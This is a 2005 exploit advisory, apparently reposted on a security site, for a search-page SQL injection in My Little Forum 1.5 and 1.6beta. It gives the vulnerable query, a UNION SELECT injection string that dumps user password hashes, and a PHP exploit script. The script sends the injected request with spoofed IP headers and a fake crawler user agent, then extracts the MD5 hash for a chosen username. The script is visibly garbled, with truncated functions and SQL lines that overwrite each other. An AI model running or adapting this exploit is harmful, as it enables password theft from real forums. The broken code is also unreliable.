My Little Forum SQL Injection

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

My Little Forum SQL Injection

来源：http://rgod.altervista.org 作者：rgod 发布时间：2005-09-27

My Little Forum SQL Injection

Summary
my little forum - "A simple web-forum that supports classical thread view (message tree) as well as message board view to display the messages."

My Little Forum vulnerable to SQL Injection.

Credit:
The information has been provided by rgod.
The original article can be found at: http://rgod.altervista.org/mylittle15_16b.html

Details
Vulnerable Systems:
* my little forum versions 1.5 and 1.6beta

Vulnerable Code:
From line 144 of search.php:
...
$result = mysql_query("SELECT id, pid, tid, DATE_FORMAT(time + INTERVAL ".
$time_difference." HOUR,'".$lang['time_format']."') AS Uhrzeit,
DATE_FORMAT(time + INTERVAL ".$time_difference." HOUR, '".$lang['time_format']."')
AS Datum, subject, name, email, hp, place, text, category FROM ".$forum_table."
WHERE ".$search_string." ORDER BY tid DESC, time ASC LIMIT ".$ul.", "
.$settings['search_results_per_page'], $connid);
...

Now goto the search page, select "phrase", and type:
[whatever]%' UNION SELECT user_pw, user_pw, user_pw, user_pw, user_pw, user_pw, user_pw, user_pw, user_pw, user_pw, user_pw, user_pw FROM forum_userdata where user_name='[username]' /*

If magic quotes are off you will have any admin/user password hash 'cause $searchstring var is not filtered.

Exploit:
<?php
# mlfexpl.php #
# #
# My Little Forum 1.5 ( possibly prior versions) SQL Injection / #
# MD5 password hash disclosure poc exploit with proxy support #
# #
# by rgod #
# site: http://rgod.altervista.org #
# #
# make these changes in php.ini if you have troubles #
# to launch this script: #
# allow_call_time_pass_reference = on #
# register_globals = on #
# #
# usage: launch this script from Apache, fill requested fields, then... #
# dump all password hashes from database right now... #
# #
# Sun-Tzu: "You can be sure of succeeding in your attacks if you only attack #
# places which are undefended. You can ensure the safety of your defense if #
# you only hold positions that cannot be attacked." #

error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout", 2);
ob_implicit_flush (1);

echo'<head><title>My Little Forum 1.5 SQL Injection </title><meta http-equiv="Co
ntent-Type" content="text/html; charset=iso-8859-1"><style type="text/css"> </style></head> <body> <p class="Stile6"> My Little Forum 1
.5 SQL Injection </p><p class="Stile6">a script by rgod at <a href="http: //rgod
.altervista.org" target="_blank" > http://rgod.altervista.org </a> </p><table
width="84%"><tr><td width="43%"> <form name="form1" method="post" action="'
.$SERVER[PHP_SELF].'?path=value&host=value&port=value&proxy=value&username=value
"><p><input type="text" name="host"><span class="Stile5">hostname (ex: www.siten
ame.com) </span></p><p><input type="text" name="path"> <span class="Stile5">
path (ex: /mylf/ or just /) </span></p><p><input type="text" name="port" ><span
class="Stile5"> specify a port other than 80 (default value)</span></p><p><input
type="text" name="proxy"> <span class="Stile5"> send exploit through an HTTP
proxy (ip:port) </span> </p> <p> <input type="text" name="username"> <span class
-"Stile5">username whom you want MD5 hash </span> </p> <p> <input type="submit"
name="Submit" value="go!"></p></form></td></tr></table></body>';

for ($li=$ci*16; $li<=strlen($headeri); $li++)
{ echo "<td>".$headeri[$li]."</td>";
}
echo "</tr></table>";
}

$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';

$html='';
while (!feof($ock))
{
$html.=fgets($ock);
}
}
else
{
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html)))
{
$html.=fread($ock,1);
}
}
fclose($ock);
if ($show) {echo nl2br(htmlentities($html));}
}

if (($path<>'') and ($host<>'') and ($username<>''))
{
if ($port=='') {$port=80;}

$sql="%' UNION SELECT user_pw, user_pw, user_pw, user_pw, user_pw, user_pw, user_pw, user_pw, user_pw, user_pw, user_pw";
$sql=", user_pw"; //if version is 1.6 beta, just add a comment to ths line
$sql=" FROM forum_userdata WHERE user_name='".$username."'/*";
$sql=urlencode($sql);

if ($proxy=='')
{$packet="GET ".$path."search.php?search=".$sql."&ao=phrase HTTP/1.1\r\n";}
else
{$packet="GET http://".$host.$path."search.php?search=".$sql."&ao=phrase HTTP/1.1\r\n";}
$packet.="Client-IP: 127.0.0.1\r\n";
$packet.="X-Forwarded-For: 127.0.0.1\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/msword, */*\r\n";
$packet.="Referer: http://".$host.$path."search.php\r\n";
$packet.="Accept-Language: en\r\n";
$packet.="Accept-Encoding: gzip, deflate\r\n";
$packet.="User-Agent: Baiduspider+(+http://www.baidu.com/search/spider.htm)\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Keep-Alive\r\n\r\n";
show($packet);
sendpacket($packet,0);
$temp=explode(';<span class="category">(',$html);
$temp2=explode(')</span>',$temp[1]);
$hash=$temp2[0];

echo '<br>username: '.$username.' hash: '.$hash;
# debugging...
//echo htmlentities($html);
}
else
{
echo '<br>fill in all requested fields, optionally specify a proxy...<br>';
}
?>

Version 1.6beta is vulnerable too:
...
$result = mysql_query("SELECT id, pid, tid, UNIX_TIMESTAMP(time + INTERVAL ".$time_difference." HOUR) AS
Uhrzeit, subject, name, email, hp, place, text, category FROM ".$db_settings['forum_table']."
WHERE ".$search_string." ORDER BY tid DESC, time ASC LIMIT ".$ul.", ".$settings['search_results_per_page'],
$connid);
...

You will have same results, deleting a statement in injection string:

[whatever]%' UNION SELECT user_pw, user_pw, user_pw, user_pw, user_pw, user_pw, user_pw, user_pw, user_pw, user_pw, user_pw FROM forum_userdata where user_name='[username]' /*

[